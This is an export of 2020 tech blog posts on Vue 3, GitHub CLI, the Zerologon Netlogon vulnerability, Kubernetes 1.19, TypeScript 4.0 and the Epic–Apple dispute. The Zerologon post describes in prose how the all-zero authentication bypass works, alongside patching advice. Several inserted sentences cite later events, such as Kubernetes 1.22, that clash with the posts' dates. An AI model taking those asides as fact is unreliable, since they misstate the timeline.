fundamental changes to the reactivity system, component model, and rendering pipeline.\nI\u0026rsquo;ve been keeping an eye on Vue since its early days, and while I primarily work on backend systems, the frontend framework landscape directly impacts every full-stack project I touch. Vue 3 represents some genuinely interesting architectural decisions that are worth examining, regardless of your framework allegiance.\nThe Composition API # The headline feature is the Composition API, and it addresses a real problem that anyone who\u0026rsquo;s built complex Vue 2 applications has encountered: component organization doesn\u0026rsquo;t scale well with the Options API.\nIn Vue 2, you organize code by option type — all data in one block, all methods in another, all computed properties in yet another. For small components, this is clean and readable. For large components with multiple logical concerns, it means that related code gets scattered across the file. Your search feature\u0026rsquo;s data is in data(), its methods in methods, its computed properties in computed, and its watchers in watch. Understanding the search feature means jumping back and forth across the component.\nThe Composition API lets you organize by logical concern instead:\nimport { ref, computed, onMounted } from \u0026#39;vue\u0026#39; export default { setup() { // Search feature — all together const searchQuery = ref(\u0026#39;\u0026#39;) const results = ref([]) const hasResults = computed(() =\u0026gt; results.value.length \u0026gt; 0) async function search() { results.value = await fetchResults(searchQuery.value) } // Pagination — all together const page = ref(1) const pageSize = ref(20) function nextPage() { page.value++ } onMounted(() =\u0026gt; search()) return { searchQuery, results, hasResults, search, page, nextPage } } } More importantly, these logical blocks can be extracted into composable functions — Vue\u0026rsquo;s answer to React\u0026rsquo;s hooks. A useSearch() function can encapsulate the search logic and be reused across components with full reactivity intact.\nThe Options API isn\u0026rsquo;t going away, which is a smart decision. Existing codebases and developers who prefer the structured approach can continue as before. The Composition API is additive, not a replacement.\nPerformance Gains # The performance improvements are substantial and come from multiple angles. The virtual DOM has been rewritten with a compiler-informed strategy. Vue 3\u0026rsquo;s template compiler analyzes templates at build time and generates optimized rendering code that skips static content during diffing.\nConsider a template with mostly static content and a few dynamic bindings. Vue 2 would diff the entire virtual DOM tree on every update. Vue 3\u0026rsquo;s compiler marks static subtrees and hoists them out of the render function entirely. Only the dynamic parts participate in the diff process.\nThe numbers the team is reporting are impressive: up to 2x faster mounting, 2-3x faster updates, and up to 50% less memory usage compared to Vue 2. In tree-shaking scenarios, a minimal Vue 3 application weighs in at around 10KB gzipped versus Vue 2\u0026rsquo;s approximately 23KB baseline.\nTypeScript from the Ground Up # Vue 3 is written entirely in TypeScript, and the difference in developer experience is immediately noticeable. Vue 2\u0026rsquo;s TypeScript support always felt bolted on — class-based components through vue-class-component, decorated properties, and type definitions that didn\u0026rsquo;t always match the runtime behavior.\nWith Vue 3, TypeScript support is native. The Composition API\u0026rsquo;s function-based approach maps naturally to TypeScript\u0026rsquo;s type inference:\nconst count = ref(0) // Ref\u0026lt;number\u0026gt; — inferred const doubled = computed(() =\u0026gt; count.value * 2) // ComputedRef\u0026lt;number\u0026gt; — inferred Props get proper type checking, emits can be typed, and the entire API surface has accurate type definitions because the types come from the same codebase as the runtime.\nFor teams that have been gradually adopting TypeScript (and at this point, who isn\u0026rsquo;t?), this removes one of the biggest friction points of using Vue in a typed codebase.\nThe Migration Question # Here\u0026rsquo;s where it gets real: migration. Vue 3 introduces breaking changes. The filter syntax is removed. Event bus patterns using $on, $off, and $once are gone. The global API surface has changed. Some widely-used community libraries aren\u0026rsquo;t compatible yet.\nThe Vue team is taking a pragmatic approach with a migration build that provides Vue 2 compatible behavior while emitting deprecation warnings. It\u0026rsquo;s not a drop-in replacement, but it\u0026rsquo;s a migration path — which is more than some framework major versions have offered.\nMy advice for teams considering migration: wait a few months. Let the ecosystem catch up. Libraries like Vue Router, Vuex, and popular UI frameworks need time to ship Vue 3 compatible versions. Starting a new project? Vue 3 is ready. Migrating a large existing application? Patience will serve you better than haste.\nMy Take # What impresses me most about Vue 3 isn\u0026rsquo;t any single feature — it\u0026rsquo;s the discipline of the process. The RFC system meant that major API changes were debated publicly before implementation. The two-year timeline, while longer than initially planned, reflects a team that chose to get it right over getting it shipped.\nThe Composition API is a genuine advancement in component design patterns, not just for Vue but as an idea. The performance work shows that framework-level optimization still has meaningful headroom. And the TypeScript rewrite positions Vue well for the next several years of frontend development.\nEvan You and the Vue team deserve credit for pulling off a major framework rewrite without fragmenting the community. That\u0026rsquo;s harder than the technical work, and they seem to be managing it well. Vue 3.0 is a solid foundation — now let\u0026rsquo;s see the ecosystem build on it.\n","date":"24 September 2020","externalUrl":null,"permalink":"/posts/200924-vuejs-3-one-piece-rewrite/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Vue.js 3.0 ships after two years of development with a TypeScript rewrite, Composition API, and significant performance improvements.","title":"Vue.js 3.0 'One Piece' — A Complete Rewrite Worth the Wait","type":"posts"},{"content":"GitHub just shipped CLI 1.0, and as someone who has spent most of his career in a terminal, I\u0026rsquo;m genuinely pleased. The gh command brings GitHub\u0026rsquo;s core workflows — pull requests, issues, releases, repository management — directly into the command line, without the context-switching overhead of opening a browser.\nYes, there have been third-party tools like hub doing some of this for years. But there\u0026rsquo;s something meaningful about the official GitHub team building and maintaining this. It signals that terminal-first workflows aren\u0026rsquo;t a niche preference — they\u0026rsquo;re a first-class development pattern.\nWhat You Can Actually Do # The 1.0 release covers the workflows that most developers interact with daily. Here\u0026rsquo;s what stood out to me:\nPull Requests are the star of the show. You can create, review, check out, and merge PRs without leaving your terminal:\n# Create a PR from the current branch gh pr create --title \u0026#34;Fix caching bug\u0026#34; --body \u0026#34;Resolves #42\u0026#34; # Check out someone else\u0026#39;s PR locally gh pr checkout 123 # Review and approve gh pr review 123 --approve # Merge when ready gh pr merge 123 --squash Issues get similar treatment. Create them, list them, view them, close them — all from the command line. The gh issue create command even supports labels and assignees directly.\nRepository operations round things out. You can create repos, fork them, clone them (with gh repo clone owner/repo instead of remembering the full URL), and view their details.\nWhat I appreciate is the interactive mode. Running gh pr create without flags drops you into a guided flow that asks for title, body, reviewers, and labels. It\u0026rsquo;s a thoughtful design choice — scriptable when you need automation, interactive when you\u0026rsquo;re working manually.\nWhy This Matters More Than You Think # I can hear the skeptics: \u0026ldquo;I can do all of this in the browser.\u0026rdquo; Of course you can. But that\u0026rsquo;s missing the point.\nThe value isn\u0026rsquo;t in any single command — it\u0026rsquo;s in maintaining flow state. When I\u0026rsquo;m deep in a debugging session, tracking down a race condition across three services, the last thing I want is to switch to a browser, navigate to the right repo, click through the PR creation form, and then try to remember where I was in my terminal.\nWith gh, the workflow is:\nFix the bug in your editor git add . \u0026amp;\u0026amp; git commit -m \u0026quot;Fix race condition in cache invalidation\u0026quot; git push gh pr create --title \u0026quot;Fix race condition\u0026quot; --reviewer teammate Continue working No context switch. No browser tab management. No losing your terminal scroll position. It sounds trivial, but compounded across dozens of PRs per week, it adds up.\nThere\u0026rsquo;s also the automation angle. CI scripts, deployment pipelines, and developer tooling scripts can now interact with GitHub\u0026rsquo;s PR and issue workflows through a stable, official CLI. No more shelling out to curl with raw API calls or maintaining wrapper scripts around the REST API.\nThe API Integration # Under the hood, gh wraps GitHub\u0026rsquo;s GraphQL and REST APIs. This means you also get gh api as a general-purpose tool for hitting any GitHub API endpoint:\n# Get repo details as JSON gh api repos/owner/repo # List workflow runs gh api repos/owner/repo/actions/runs --jq \u0026#39;.workflow_runs[].name\u0026#39; The --jq flag for filtering JSON output is a nice touch. For anyone who\u0026rsquo;s written scripts that pipe curl output through jq to interact with GitHub\u0026rsquo;s API, this is a cleaner alternative with built-in authentication handling.\nWhat\u0026rsquo;s Missing # No tool ships perfect at 1.0, and there are some gaps. GitHub Actions management is limited — you can view workflow runs but can\u0026rsquo;t trigger them or manage workflow files. Gist support is minimal. Project boards aren\u0026rsquo;t covered at all.\nThe extension system is also not yet available, which means you can\u0026rsquo;t add custom commands. I\u0026rsquo;d love to see a plugin architecture that lets teams add organization-specific workflows. That would take gh from \u0026ldquo;useful tool\u0026rdquo; to \u0026ldquo;essential infrastructure.\u0026rdquo;\nBut these are 1.0 omissions, not design flaws. The foundation is solid, and the team has been responsive to community feedback throughout the beta period.\nMy Take # I\u0026rsquo;ve watched developer tooling evolve substantially over the years, from CVS to SVN to Git, from FTP deployments to CI/CD pipelines, from monolithic IDEs to composable editor setups. The common thread in tools that stick is that they meet developers where they already work, rather than forcing a context switch.\nGitHub CLI does exactly that. It doesn\u0026rsquo;t try to replace the web interface — the browser is still better for code review with complex diffs, for exploring repository insights, and for managing organization settings. What gh does is handle the high-frequency, low-complexity interactions that interrupt your flow when they require a browser.\nIf you\u0026rsquo;re a terminal-centric developer (and let\u0026rsquo;s be honest, most of us are), install it today:\n# macOS brew install gh # Windows scoop install gh # Debian/Ubuntu sudo apt install gh It\u0026rsquo;s open source, cross-platform, and it just works. That\u0026rsquo;s about the best endorsement I can give any developer tool. The 1.0 label means the GitHub team is committed to stability, and the fact that it\u0026rsquo;s maintained alongside the platform itself gives me confidence it won\u0026rsquo;t become abandonware. Welcome to the toolkit, gh.\n","date":"17 September 2020","externalUrl":null,"permalink":"/posts/200917-github-cli-1-developer-workflow/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub CLI 1.0 is here, bringing pull requests, issues, and repo management to the terminal. A look at what it means for developer workflows.","title":"GitHub CLI 1.0 — The Terminal-First Workflow Gets Official","type":"posts"},{"content":"Every few years, a vulnerability comes along that makes even jaded security professionals sit up straight. CVE-2020-1472, which researchers at Secura have dubbed \u0026ldquo;Zerologon,\u0026rdquo; is one of those. It scores a perfect 10.0 on the CVSS scale — the maximum severity rating — and for once, the score isn\u0026rsquo;t hyperbole.\nThe vulnerability allows an unauthenticated attacker with network access to a domain controller to completely compromise an entire Active Directory domain. No credentials required. No user interaction needed. Just a few carefully crafted network packets, and you\u0026rsquo;re the domain admin. This is exactly the kind of critical vulnerability that attackers pursue. If that doesn\u0026rsquo;t get your attention, I\u0026rsquo;m not sure what will.\nThe Technical Breakdown # At its core, Zerologon is a cryptographic flaw in Microsoft\u0026rsquo;s Netlogon Remote Protocol (MS-NRPC), the authentication protocol used for communication between domain-joined machines and domain controllers.\nThe protocol uses AES-CFB8 encryption for a challenge-response authentication handshake. The problem? The implementation sets the initialization vector (IV) to all zeros. In AES-CFB8 mode, this means that encrypting a plaintext of all zeros will produce a ciphertext of all zeros with a probability of 1-in-256.\nAn attacker can simply attempt authentication repeatedly with a credential consisting of all zeros. On average, it takes about 256 attempts — which can be completed in roughly three seconds — to successfully authenticate. Once in, the attacker can use the Netlogon protocol to set the computer account password of the domain controller itself.\nIt\u0026rsquo;s the kind of vulnerability that makes you wonder how it persisted for so long. The cryptographic issue is, in hindsight, almost textbook. AES-CFB8 with a fixed zero IV is a well-understood weakness. But these things hide in protocols that were designed decades ago and have been layered with complexity over the years. This mirrors the OpenSSL vulnerabilities that persist in widely-used infrastructure.\nWhy This Is Worse Than It Sounds # Let me count the ways this is particularly bad:\nNo authentication required. The attacker doesn\u0026rsquo;t need any credentials, domain membership, or prior access to the network. They just need to be able to reach a domain controller on TCP port 135/445.\nIt\u0026rsquo;s fast. The entire attack completes in seconds, not minutes or hours. By the time anyone notices, it\u0026rsquo;s over.\nIt grants complete domain compromise. This isn\u0026rsquo;t a privilege escalation from user to admin. This is zero to domain admin in one step.\nExploitation is straightforward. Within days of the Secura whitepaper being published, working proof-of-concept code appeared publicly. The barrier to exploitation is low.\nActive Directory is everywhere. Virtually every enterprise network of any size runs Active Directory. This is not a niche product vulnerability — it affects the core of most corporate infrastructure.\nThe Patch Situation # Microsoft released patches in August\u0026rsquo;s Patch Tuesday — a month ago. But here\u0026rsquo;s the wrinkle: the fix is being rolled out in two phases. The August patch enables enforcement mode but doesn\u0026rsquo;t fully block vulnerable connections. Full enforcement is scheduled for February 2021.\nThis phased approach is understandable from a compatibility perspective — there are likely many legacy devices and non-Windows systems that use the Netlogon protocol and would break with immediate full enforcement. But it also means that even patched systems remain partially vulnerable if enforcement mode isn\u0026rsquo;t explicitly configured.\nMy recommendation is blunt: if you haven\u0026rsquo;t applied the August patches yet, stop reading this and go do it now. Then enable full enforcement mode immediately if your environment allows it. The risk of breaking a legacy integration is far lower than the risk of a complete domain compromise that would affect your entire organization.\nThe Bigger Picture # Zerologon is a reminder of something I\u0026rsquo;ve been saying for years: the soft, chewy interior of corporate networks is where the real danger lies. We\u0026rsquo;ve spent enormous energy on perimeter security, endpoint detection, and email filtering. Meanwhile, protocols designed in the 1990s sit at the heart of our identity infrastructure with cryptographic flaws that a second-year computer science student could identify.\nThis vulnerability also highlights the problem with patch timelines. Microsoft had this reported months ago, patched it in August, and even now we\u0026rsquo;re in a partial-enforcement state. Meanwhile, working exploit code is freely available. The window between \u0026ldquo;patch available\u0026rdquo; and \u0026ldquo;patch applied\u0026rdquo; is where attackers live, and for critical infrastructure like domain controllers, that window needs to be as close to zero as possible.\nWhat To Do Right Now # If you\u0026rsquo;re responsible for any Windows Active Directory environment:\nVerify August 2020 patches are installed on every domain controller Enable enforcement mode via the FullSecureChannelProtection registry key Monitor event logs for Event IDs 5827, 5828, and 5829, which indicate vulnerable Netlogon connections Audit network access to domain controllers — TCP 135 and 445 should not be reachable from untrusted network segments Assume breach if you were unpatched when the exploit code went public, and investigate accordingly I\u0026rsquo;ve seen a lot of critical vulnerabilities over three decades in this industry. This one genuinely deserves the urgency. The combination of ease of exploitation, severity of impact, and ubiquity of the target makes Zerologon one of the most dangerous Windows vulnerabilities in recent memory. Patch today, not tomorrow.\n","date":"10 September 2020","externalUrl":null,"permalink":"/posts/200910-zerologon-cve-2020-1472/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CVE-2020-1472, dubbed Zerologon, scores a perfect 10.0 CVSS and allows full domain takeover with a handful of packets. Here’s what you need to know.","title":"Zerologon — The 10-Out-of-10 Vulnerability That Should Terrify You","type":"posts"},{"content":"Last week, the Kubernetes project shipped version 1.19, and while it may not have the headline-grabbing appeal of some earlier releases, I think this one deserves more attention than it\u0026rsquo;s getting. After nearly three decades in this industry, I\u0026rsquo;ve learned that the releases that matter most are rarely the flashy ones — they\u0026rsquo;re the ones that make the boring stuff reliable.\nExtended Support: Finally # The single most impactful change in 1.19 isn\u0026rsquo;t a new API or a fancy feature. It\u0026rsquo;s the decision to extend the support window from 9 months to 12 months. That might sound like a minor policy tweak, but if you\u0026rsquo;ve been running Kubernetes in production, you know exactly how painful the upgrade treadmill has been.\nWith a new release every quarter and only three versions supported at any time, teams were essentially forced into a perpetual upgrade cycle. For enterprises with change management processes, compliance requirements, and the general inertia of large organizations, this was brutal. I\u0026rsquo;ve worked with teams that were spending a significant portion of their infrastructure engineering time just keeping up with Kubernetes versions rather than building on top of them.\nTwelve months of support means you can realistically plan one major upgrade per year instead of scrambling every few months. It\u0026rsquo;s a maturity signal — the project is acknowledging that production stability matters more than feature velocity.\nIngress Graduates to V1 # The Ingress API has been in beta since Kubernetes 1.1, which shipped back in 2015. Five years in beta. Let that sink in for a moment. This is one of the most widely used APIs in the entire Kubernetes ecosystem, and it\u0026rsquo;s been technically \u0026ldquo;not stable\u0026rdquo; for half a decade.\nWith 1.19, Ingress finally reaches General Availability status. The networking.k8s.io/v1 version brings some welcome refinements:\nA pathType field that removes ambiguity about how paths are matched IngressClass resources that formalize what was previously handled through annotations Cleaner separation between different ingress controller implementations If you\u0026rsquo;re running any kind of web workload on Kubernetes (and who isn\u0026rsquo;t?), this matters. The annotation-based approach to configuring ingress controllers was always a hack — every controller had its own set of non-standard annotations, and switching between them meant rewriting your manifests. IngressClass doesn\u0026rsquo;t solve everything, but it\u0026rsquo;s a step in the right direction.\nStorage Capacity Tracking # Another feature that caught my eye is the storage capacity tracking mechanism, entering alpha in this release. The problem it addresses is something I\u0026rsquo;ve run into personally: Kubernetes\u0026rsquo; scheduler doesn\u0026rsquo;t know how much storage capacity is actually available on nodes when making pod scheduling decisions.\nThis means you can end up with a pod scheduled to a node that can\u0026rsquo;t actually provision the persistent volume it needs. The pod just sits there in a pending state, and you\u0026rsquo;re left debugging why your stateful workload won\u0026rsquo;t start.\nThe new CSIStorageCapacity objects let storage drivers report available capacity back to the scheduler. It\u0026rsquo;s alpha, so don\u0026rsquo;t run to production with it, but it\u0026rsquo;s addressing a real operational pain point that anyone running stateful workloads on Kubernetes has encountered.\nSeccomp Profiles Go GA # Security folks will appreciate that seccomp profile support has also reached GA. Seccomp (secure computing mode) lets you restrict which system calls a container can make, and it\u0026rsquo;s been a recommended security hardening measure for years. Having it as a stable, first-class feature in the pod security context removes another barrier to proper container security.\nThe syntax is cleaner now too. Instead of the old annotation-based approach (seccomp.security.alpha.kubernetes.io/pod), you can specify seccomp profiles directly in the pod\u0026rsquo;s securityContext:\nsecurityContext: seccompProfile: type: RuntimeDefault Small change, big improvement in usability. Security features that are hard to use don\u0026rsquo;t get used.\nMy Take # I\u0026rsquo;ve been watching Kubernetes evolve since its early days, and 1.19 feels like a release that reflects where the project needs to be right now. The container orchestration wars are effectively over — Kubernetes won. The question is no longer \u0026ldquo;should we use Kubernetes?\u0026rdquo; but \u0026ldquo;how do we run Kubernetes well?\u0026rdquo;\nThat means longer support windows, stabilizing long-running beta APIs, and filling in operational gaps like storage capacity tracking. It\u0026rsquo;s not exciting, but it\u0026rsquo;s exactly what the ecosystem needs.\nThe extended support window alone will save countless engineering hours across the industry. And the Ingress GA promotion, while overdue, signals that the project takes API stability seriously — even if the timeline is longer than anyone would like.\nIf you\u0026rsquo;re planning your next upgrade cycle, 1.19 is a solid target. Just remember: read the release notes carefully before you start. There are always deprecations hiding in there.\n","date":"3 September 2020","externalUrl":null,"permalink":"/posts/200903-kubernetes-119-extensibility/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Kubernetes 1.19 lands with extended support windows, Ingress API improvements, and a clear signal that the platform is maturing fast.","title":"Kubernetes 1.19 — The Extensibility Release That Quietly Matters","type":"posts"},{"content":"Kubernetes 1.19 was released yesterday, and for once, the headline isn\u0026rsquo;t a flashy new feature — it\u0026rsquo;s stability. This release extends the support window from 9 months to a full year, making it the longest-supported Kubernetes release to date. For those of us running Kubernetes in production, this is arguably more valuable than any new API or controller.\nThe release includes 34 enhancements, with 10 graduating to stable, 15 in beta, and 9 entering alpha. It\u0026rsquo;s a mature, well-rounded release that reflects where Kubernetes is in its lifecycle: less about adding surface area and more about hardening what\u0026rsquo;s already there.\nThe Support Window Extension # Let\u0026rsquo;s talk about why a longer support window matters so much. In a quarterly release cycle with 9-month support, you had roughly 3-6 months of overlap between supported versions. This meant teams were perpetually planning or executing upgrades. For organizations with change management processes, compliance requirements, or simply limited DevOps bandwidth, staying on a supported version was a treadmill.\nWith 12 months of support, you get breathing room. You can skip a release without falling off the support cliff. You can test upgrades more thoroughly. You can align Kubernetes upgrades with your own release cycles instead of being dictated by the upstream schedule.\nI\u0026rsquo;ve managed Kubernetes clusters across several organizations, and the upgrade pressure was consistently one of the biggest operational challenges. Not because upgrades are technically difficult (the process has improved dramatically), but because every upgrade requires testing workloads, validating configurations, coordinating with application teams, and scheduling maintenance windows. Doing this every quarter is exhausting. Doing it every six months is manageable. By the time Kubernetes 1.22 arrived, the extended support window had proven its value to the broader ecosystem.\nThe Kubernetes project acknowledged that the rapid release cycle was causing strain on both users and the project itself. Later Kubernetes releases continued to balance innovation and stability. Patch releases for three concurrent versions consumed significant maintainer bandwidth. By extending the support window, they\u0026rsquo;re making a pragmatic trade-off: slightly more maintenance burden per version, but better sustainability for both the project and its users.\nIngress API Graduation to V1 # Kubernetes API maturity has been a consistent theme of platform evolution.\nThe Ingress API finally graduates to networking.k8s.io/v1 in this release. Ingress has been in beta since Kubernetes 1.1 — that\u0026rsquo;s nearly five years in beta, which has become something of a running joke in the community. The graduation brings formal stability guarantees and some meaningful improvements.\nThe v1 Ingress spec includes pathType, which lets you specify whether a path should be matched as an exact string, a prefix, or using the implementation-specific behavior. Gateway API would eventually provide even more sophisticated routing capabilities. This addresses a long-standing source of confusion where different ingress controllers interpreted paths differently, leading to subtle routing bugs that were hard to diagnose.\napiVersion: networking.k8s.io/v1 kind: Ingress metadata: name: example spec: rules: - host: app.example.com http: paths: - path: /api pathType: Prefix backend: service: name: api-service port: number: 80 If you\u0026rsquo;re currently using extensions/v1beta1 or networking.k8s.io/v1beta1 for your Ingress resources, now is the time to plan your migration. The beta APIs will be deprecated and eventually removed. The migration is straightforward — mostly renaming fields and adding pathType — but it touches every Ingress manifest in your cluster, so plan accordingly.\nStorage Improvements # Several storage features matured in 1.19. CSI volume health monitoring entered alpha, providing a standardized way to detect and report when persistent volumes become unhealthy. If you\u0026rsquo;ve ever had a pod stuck in a crash loop because its underlying storage went bad, you\u0026rsquo;ll appreciate having a proper signal for this rather than relying on application-level timeouts.\nGeneric ephemeral volumes also reached beta, allowing any CSI driver to provide ephemeral storage. This is useful for workloads that need temporary storage with specific characteristics — think scratch space on fast local SSDs or temporary volumes from a specific storage class. Previously, only CSI drivers that explicitly supported ephemeral mode could be used this way.\nFor production operators, these storage improvements are incremental but important. Storage is often the most operationally complex part of a Kubernetes deployment, and better tooling for monitoring and managing volumes reduces the risk of data-related incidents.\nStructured Logging Initiative # Kubernetes 1.19 kicks off a structured logging initiative that aims to migrate the project\u0026rsquo;s logging from unstructured text to structured key-value pairs. This is a long-term effort that will play out across multiple releases, but the foundation is being laid now.\nAs someone who has spent more hours than I\u0026rsquo;d like to admit parsing Kubernetes logs with regex, structured logging can\u0026rsquo;t come soon enough. The current log format is inconsistent across components, making it difficult to build reliable log parsing pipelines. Structured logs will enable better filtering, aggregation, and alerting — the basic building blocks of operational observability.\nThe practical impact won\u0026rsquo;t be felt immediately, as the migration will be gradual. But if you\u0026rsquo;re building or evaluating log aggregation infrastructure for your clusters, knowing that structured logs are coming should inform your architecture decisions.\nMy Take # Kubernetes 1.19 is a release that prioritizes the people who run Kubernetes over the people who present about it at conferences. The extended support window, Ingress graduation, and storage improvements are all operational concerns — they make Kubernetes easier to run reliably in production.\nThis shift in priorities feels right for where Kubernetes is in its maturity curve. The platform has won the container orchestration battle. The question is no longer \u0026ldquo;should we use Kubernetes?\u0026rdquo; but \u0026ldquo;how do we run it well?\u0026rdquo; Releases that focus on stability, supportability, and operational tooling answer that question better than new alpha features ever could.\nIf you\u0026rsquo;re running 1.17 or 1.18, I\u0026rsquo;d recommend planning your upgrade to 1.19 within the next quarter. The longer support window gives you a stable foundation, and the Ingress v1 migration is something you\u0026rsquo;ll need to do regardless. Get ahead of it while the timeline is comfortable.\n","date":"27 August 2020","externalUrl":null,"permalink":"/posts/200827-kubernetes-1-19-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Kubernetes 1.19 arrives with the longest support window yet and a focus on stability features. For production operators, this is the release we’ve been asking for.","title":"Kubernetes 1.19 — Stability Takes Center Stage","type":"posts"},{"content":"TypeScript 4.0 landed today, and despite the team\u0026rsquo;s repeated assurances that major version bumps don\u0026rsquo;t mean breaking changes (they follow semver for the compiler API, not the language), this release feels genuinely significant. The headline features — variadic tuple types, labeled tuple elements, and class property inference from constructors — represent meaningful improvements to TypeScript\u0026rsquo;s type system that I\u0026rsquo;ve been wanting for years.\nI\u0026rsquo;ve been writing TypeScript since the 2.x days, gradually migrating Node.js projects from plain JavaScript as the type system matured. Later language evolution across the industry showed similar type system maturation. With 4.0, I\u0026rsquo;m more confident than ever that TypeScript is the right choice for any non-trivial JavaScript project. Modern development practices increasingly rely on strong typing.\nVariadic Tuple Types: Finally # The feature I\u0026rsquo;m most excited about is variadic tuple types. If you\u0026rsquo;ve ever tried to write a strongly-typed concat function, a tail utility, or anything that manipulates arrays at the type level, you\u0026rsquo;ve hit the wall that this feature demolishes.\nPreviously, if you wanted to type a function that concatenates two arrays, you\u0026rsquo;d need to write dozens of overloads to cover different tuple lengths. Libraries like ts-toolbelt had elaborate workarounds, and the TypeScript compiler\u0026rsquo;s own type definitions used massive overload lists for methods like Promise.all.\nWith variadic tuple types, you can express this naturally:\nfunction concat\u0026lt;T extends unknown[], U extends unknown[]\u0026gt;( arr1: [...T], arr2: [...U] ): [...T, ...U] { return [...arr1, ...arr2]; } The spread operator now works at the type level, matching how it works at the value level. This is elegant, and it\u0026rsquo;s the kind of type-system feature that makes TypeScript feel less like a bolt-on and more like a language designed from the ground up.\nFor library authors, this is transformative. Typing higher-order functions, curry implementations, and variadic APIs becomes dramatically simpler. The JavaScript tooling ecosystem continued to benefit from TypeScript\u0026rsquo;s type maturity. I expect we\u0026rsquo;ll see significant improvements in the type definitions for popular libraries in the coming months.\nLabeled Tuple Elements # This one is smaller but immediately practical. Tuple types can now have labels:\ntype Range = [start: number, end: number]; type UserEntry = [id: number, name: string, active: boolean]; Without labels, tuple types are opaque — you see [number, number] in your IDE and have no idea what each position means without checking the documentation. Labels fix this by providing named context directly in the type signature.\nThis matters for API design. When a function returns a tuple (as has become more common with React hooks and similar patterns), labeled tuples make the return type self-documenting. It\u0026rsquo;s a quality-of-life improvement that costs nothing and improves code readability everywhere it\u0026rsquo;s used.\nShort-Circuiting in Compound Assignments # TypeScript 4.0 supports the new JavaScript logical assignment operators: \u0026amp;\u0026amp;=, ||=, and ??=. These correspond to the TC39 Stage 4 proposal that\u0026rsquo;s heading into the next ECMAScript specification.\n// Before options.value = options.value ?? defaultValue; // After options.value ??= defaultValue; This is syntactic sugar, but good syntactic sugar. The ??= operator in particular fills a common pattern in configuration handling and default value assignment. I\u0026rsquo;ve written the longhand version thousands of times across various projects, and having a concise alternative will make code cleaner.\nWhat I appreciate about TypeScript\u0026rsquo;s approach here is that they track the TC39 process closely and implement proposals once they reach Stage 3 or 4. You get access to future JavaScript features today, with type safety, and confidence that the syntax won\u0026rsquo;t change before it\u0026rsquo;s standardized.\nImproved Editor Experience # TypeScript 4.0 brings several editor improvements that might not make the blog post headlines but will save you time daily. The compiler can now partially process files during editing, providing faster feedback in large projects. Auto-import suggestions are smarter, preferring imports from packages you\u0026rsquo;ve already imported elsewhere in the project.\nThere\u0026rsquo;s also /** @deprecated */ JSDoc support, which shows deprecated API usage with a strikethrough in your editor. This is particularly useful when maintaining libraries — you can mark old APIs as deprecated and give consumers visual feedback without breaking their builds.\nFor those of us who spend most of our day in VS Code (or any editor with TypeScript language server support), these incremental improvements compound. The gap between \u0026ldquo;writing code\u0026rdquo; and \u0026ldquo;having your tools understand your code\u0026rdquo; continues to shrink with each release.\nMy Take # TypeScript 4.0 is a confident, well-executed release. The team resisted the temptation to cram breaking changes into a major version bump, instead focusing on features that make the type system more expressive without adding complexity for developers who don\u0026rsquo;t need the advanced features.\nWhat impresses me most about TypeScript\u0026rsquo;s trajectory is the consistency. Every release since 2.0 has added meaningful capabilities while maintaining backward compatibility. The migration path from JavaScript to TypeScript remains smooth, and existing TypeScript codebases can adopt new features incrementally. That\u0026rsquo;s hard to do, and the team deserves credit for maintaining that discipline over years of development.\nIf you\u0026rsquo;re still on the fence about TypeScript, 4.0 is as good a time as any to make the switch. The tooling is mature, the community is enormous, and the language itself is at a point where it handles the vast majority of real-world patterns gracefully. And if you\u0026rsquo;re already a TypeScript user, upgrade and enjoy. This one\u0026rsquo;s a good release.\n","date":"20 August 2020","externalUrl":null,"permalink":"/posts/200820-typescript-4-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"TypeScript 4.0 is here with variadic tuple types, labeled tuples, and smarter inference. It’s a major version that earns its number.","title":"TypeScript 4.0 — A Milestone Worth Celebrating","type":"posts"},{"content":"Today might be remembered as a turning point for the mobile development ecosystem. Epic Games deliberately triggered a confrontation with Apple by adding a direct payment option to Fortnite on iOS, bypassing Apple\u0026rsquo;s 30% commission on in-app purchases. Apple responded within hours by removing Fortnite from the App Store. Epic, clearly prepared, immediately filed a lawsuit and launched a PR campaign called \u0026ldquo;#FreeFortnite\u0026rdquo; — complete with a parody of Apple\u0026rsquo;s famous 1984 ad.\nThis isn\u0026rsquo;t a spontaneous dispute. This is a carefully orchestrated legal and public relations strategy, and regardless of where you stand, it has the potential to reshape how all of us build and distribute software.\nThe 30% Problem # Apple\u0026rsquo;s App Store takes a 30% commission on digital purchases. This has been the standard since the App Store launched in 2008, and Google\u0026rsquo;s Play Store follows the same model. For context, that means if a user buys a $10 in-app item, the developer receives $7 and Apple gets $3. This represents a form of platform consolidation that has shaped the entire mobile economy.\nFor twelve years, developers have largely accepted this as the cost of accessing Apple\u0026rsquo;s platform. But the frustration has been building. Spotify filed an EU antitrust complaint last year. The European Commission opened investigations. The US House Judiciary Committee held hearings on tech platform power, where Apple\u0026rsquo;s Tim Cook testified alongside tech leaders, signaling increasing regulatory scrutiny.\nEpic\u0026rsquo;s move is different because they\u0026rsquo;re not just complaining — they\u0026rsquo;re forcing a legal confrontation while simultaneously waging a public campaign. The lawsuit filing is substantive, running to 62 pages and drawing on antitrust precedent. This isn\u0026rsquo;t a publicity stunt; it\u0026rsquo;s a legal strategy with serious resources behind it.\nWhy This Matters Beyond Gaming # If you\u0026rsquo;re thinking \u0026ldquo;I don\u0026rsquo;t make games, this doesn\u0026rsquo;t affect me,\u0026rdquo; think again. Apple\u0026rsquo;s App Store policies impact every developer who ships on iOS. The 30% commission applies to digital goods and services across the board — subscriptions, digital content, premium features. If your app charges for anything digital, Apple takes its cut.\nThe restrictions go beyond the commission. Apple\u0026rsquo;s guidelines prohibit apps from even telling users that they can purchase content elsewhere. You can\u0026rsquo;t link to your website for purchases. You can\u0026rsquo;t mention that a web version exists with different pricing. This information asymmetry is what frustrates many developers, myself included. It\u0026rsquo;s one thing to charge a fee for distribution; it\u0026rsquo;s another to prevent your customers from knowing about alternatives.\nFor enterprise and B2B developers, the impact is more nuanced but still real. Apple\u0026rsquo;s review process introduces unpredictable delays in your release cycle. Their interpretation of guidelines can change without notice, potentially breaking your business model overnight. I\u0026rsquo;ve worked with teams that spent weeks redesigning features to comply with App Store review feedback, only to see similar features approved in competing apps or platforms.\nThe Possible Outcomes # 